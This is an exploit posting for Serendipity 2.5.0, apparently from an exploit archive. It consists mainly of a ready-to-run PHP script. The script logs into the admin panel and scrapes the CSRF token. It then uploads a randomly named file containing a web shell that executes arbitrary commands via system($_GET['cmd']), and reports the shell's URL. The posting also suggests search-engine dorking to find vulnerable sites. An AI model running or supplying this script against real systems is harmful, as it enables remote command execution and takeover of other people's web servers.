📄 Serendipity 2.5.0 PHP Code Injection

=============================================================================================================================================
    | # Title     : Serendipity 2.5.0 PHP COde Injection Vulnerability                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.s9y.org/latest                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Serendipity 2.5.0 - Remote Command Execution Exploit in PHP
    
       (Related : https://packetstorm.news/files/id/178890/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php <siteurl> <username> <password>
    
    [+] PayLoad :
    
    <?php
    function generate_filename($extension = ".inc") {
        $characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        $filename = '';
        for ($i = 0; $i < 5; $i++) {
            $filename .= $characters[rand(0, strlen($characters) - 1)];
        }
        return $filename . $extension;
    }
    
    function get_csrf_token($response) {
        preg_match('/<input.*name="serendipity\[token\]".*value="(.*?)"/', $response, $matches);
        return $matches[1] ?? null;
    }
    
    function login($base_url, $username, $password) {
        echo "Logging in...\n";
        sleep(2);
    
        $session = curl_init();
        curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php");
        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
        $login_page = curl_exec($session);
        $token = get_csrf_token($login_page);
    
        $data = [
            "serendipity[action]" => "admin",
            "serendipity[user]" => $username,
            "serendipity[pass]" => $password,
            "submit" => "Login",
            "serendipity[token]" => $token
        ];
    
        $headers = [
            "Content-Type: application/x-www-form-urlencoded",
            "Referer: " . $base_url . "/serendipity_admin.php"
        ];
    
        curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php");
        curl_setopt($session, CURLOPT_POST, true);
        curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($session, CURLOPT_HTTPHEADER, $headers);
        $response = curl_exec($session);
    
        if (strpos($response, "Add media") !== false) {
            echo "Login Successful!\n";
            sleep(2);
            return $session;
        } else {
            echo "Login Failed!\n";
            return null;
        }
    }
    
    function upload_file($session, $base_url, $filename, $token) {
        echo "Shell Preparing...\n";
        sleep(2);
    
        $boundary = "---------------------------395233558031804950903737832368";
        $headers = [
            "Content-Type: multipart/form-data; boundary=" . $boundary,
            "Referer: " . $base_url . "/serendipity_admin.php?serendipity[adminModule]=media"
        ];
    
        $payload = "--$boundary\r\n"
            . "Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
            . "$token\r\n"
            . "--$boundary\r\n"
            . "Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
            . "admin\r\n"
            . "--$boundary\r\n"
            . "Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
            . "media\r\n"
            . "--$boundary\r\n"
            . "Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
            . "add\r\n"
            . "--$boundary\r\n"
            . "Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"$filename\"\r\n"
            . "Content-Type: text/html\r\n\r\n"
            . "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">\n"
            . "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n"
            . "</form>\n<pre>\n<?php\nif(isset(\$_GET['cmd']))\n{\nsystem(\$_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n"
            . "--$boundary--\r\n";
    
        curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php?serendipity[adminModule]=media");
        curl_setopt($session, CURLOPT_POST, true);
        curl_setopt($session, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($session, CURLOPT_POSTFIELDS, $payload);
        $response = curl_exec($session);
    
        if (strpos($response, "File $filename successfully uploaded as") !== false) {
            echo "Your shell is ready: " . $base_url . "/uploads/$filename\n";
        } else {
            echo "Exploit Failed!\n";
        }
    }
    
    function main($base_url, $username, $password) {
        $filename = generate_filename();
        $session = login($base_url, $username, $password);
        if ($session) {
            $token = get_csrf_token(curl_exec($session));
            upload_file($session, $base_url, $filename, $token);
        }
    }
    
    if ($argc != 4) {
        echo "Usage: php script.php <siteurl> <username> <password>\n";
    } else {
        main($argv[1], $argv[2], $argv[3]);
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================